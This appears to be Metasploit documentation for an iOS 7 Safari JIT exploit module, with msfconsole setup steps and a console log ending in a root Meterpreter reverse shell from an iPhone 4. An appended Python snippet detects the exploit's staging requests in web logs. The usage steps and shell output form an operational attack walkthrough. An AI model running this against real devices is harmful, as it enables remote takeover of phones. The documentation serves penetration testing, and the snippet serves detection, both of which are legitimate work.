metasploit-gs/documentation/modules/exploit/apple_ios/browser/safari_jit.md
2020-08-13 14:26:41 -04:00
## Vulnerable Application

This module exploits a JIT optimization bug in Safari's WebKit engine. The bug allows the module to
write shellcode into an RWX memory region in JavaScriptCore and execute it. The
shellcode contains a kernel exploit (CVE-2016-4669) that obtains kernel read/write,
escalates to root and disables code signing. Finally, the module downloads and executes the
Meterpreter payload.

This module has been tested against iOS 7.1.2 on an iPhone 4.

## Verification Steps

1. Start msfconsole
1. Do: `use exploit/apple_ios/browser/safari_jit`
1. Do: `set lhost [ip]`
1. Do: `set srvhost [ip]`
1. Do: `run`
1. Browse to the website with a vulnerable device
1. You should get a root shell.

## Options

### DEBUG_EXPLOIT

Show debug information during exploitation. This will add entries to the iPhone syslog related to exploitation and
loading of the payload. Defaults to `false`.

## Scenarios

### iPhone 4 with iOS 7.1.2

```
msf5 > use exploit/apple_ios/browser/safari_jit
[*] Using configured payload apple_ios/armle/meterpreter_reverse_tcp
msf5 exploit(apple_ios/browser/safari_jit) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf5 exploit(apple_ios/browser/safari_jit) > set srvhost 1.1.1.1
srvhost => 1.1.1.1
msf5 exploit(apple_ios/browser/safari_jit) > set verbose true
verbose => true
msf5 exploit(apple_ios/browser/safari_jit) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(apple_ios/browser/safari_jit) >
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Using URL: http://1.1.1.1:8080/
[*] Server started.
[*] 2.2.2.2 safari_jit - Request / from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 2.2.2.2 safari_jit - Request /loader.b64?cache=1596557302841 from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 2.2.2.2 safari_jit - Request /macho.b64?cache=1596557303179 from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 2.2.2.2 safari_jit - Request /payload from MobileSafari/9537.53 CFNetwork/672.1.15 Darwin/14.0.0
[+] 2.2.2.2 safari_jit - Target is vulnerable, sending payload!
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:49299) at 2020-08-04 12:08:27 -0400
sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: root @ iPhone (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer : 2.2.2.2
OS : iPhone3,3 (iOS 11D257)
Architecture : armv7
BuildTuple : arm-iphone-darwin
Meterpreter : armle/apple_ios
```
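
A defender-side illustration, added here and not part of the module or its documentation: the request sequence in the console output above (`/`, `/loader.b64`, `/macho.b64`, `/payload`) is a recognisable staging pattern. This Python parses constructed access-log lines in an assumed simplified `ip GET path user-agent` layout and reports clients that fetch the three staging resources in order, along with the iOS version their User-Agent advertises.

```python
import re
from collections import defaultdict

# Constructed log lines modelled on the module's console output above (not real traffic).
# Client 2.2.2.2 walks the full staging chain; 3.3.3.3 only touches the loader.
SAMPLE_LOG = """\
2.2.2.2 GET / Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 Safari/9537.53
2.2.2.2 GET /loader.b64?cache=1596557302841 Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 Safari/9537.53
2.2.2.2 GET /macho.b64?cache=1596557303179 Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 Safari/9537.53
2.2.2.2 GET /payload MobileSafari/9537.53 CFNetwork/672.1.15 Darwin/14.0.0
3.3.3.3 GET /index.html Mozilla/5.0 (iPhone; CPU iPhone OS 13_3 like Mac OS X) AppleWebKit/605.1.15 Safari/604.1
3.3.3.3 GET /loader.b64 Mozilla/5.0 (iPhone; CPU iPhone OS 13_3 like Mac OS X) AppleWebKit/605.1.15 Safari/604.1
"""

# Assumed log layout: "<ip> GET <path> <user-agent>" (hypothetical, for this example only).
LINE_RE = re.compile(r"^(?P<ip>\S+) GET (?P<path>\S+) (?P<ua>.+)$")
IOS_VERSION_RE = re.compile(r"iPhone OS (\d+)_(\d+)(?:_(\d+))?")

# Staging resources in the order the module serves them: base64 loader, base64 Mach-O, payload.
STAGE_PATHS = ("/loader.b64", "/macho.b64", "/payload")


def ios_version(user_agent):
    """Return the iOS version advertised in a Safari User-Agent as a tuple, e.g. (7, 1, 2)."""
    match = IOS_VERSION_RE.search(user_agent)
    if not match:
        return None
    return tuple(int(part) for part in match.groups() if part is not None)


def parse(log_text):
    """Parse the assumed log layout into dicts with ip, path and ua keys; skip malformed lines."""
    return [m.groupdict() for m in map(LINE_RE.match, log_text.splitlines()) if m]


def find_staging_chains(log_text):
    """Return {ip: {"stages": n, "ios": version}} for clients that fetch every stage in order."""
    per_ip = defaultdict(list)
    for row in parse(log_text):
        per_ip[row["ip"]].append(row)
    findings = {}
    for ip, rows in per_ip.items():
        stage, reported_ios = 0, None
        for row in rows:
            path = row["path"].split("?", 1)[0]  # drop the cache-busting query string
            if stage < len(STAGE_PATHS) and path == STAGE_PATHS[stage]:
                stage += 1
            reported_ios = reported_ios or ios_version(row["ua"])
        if stage == len(STAGE_PATHS):
            findings[ip] = {"stages": stage, "ios": reported_ios}
    return findings
```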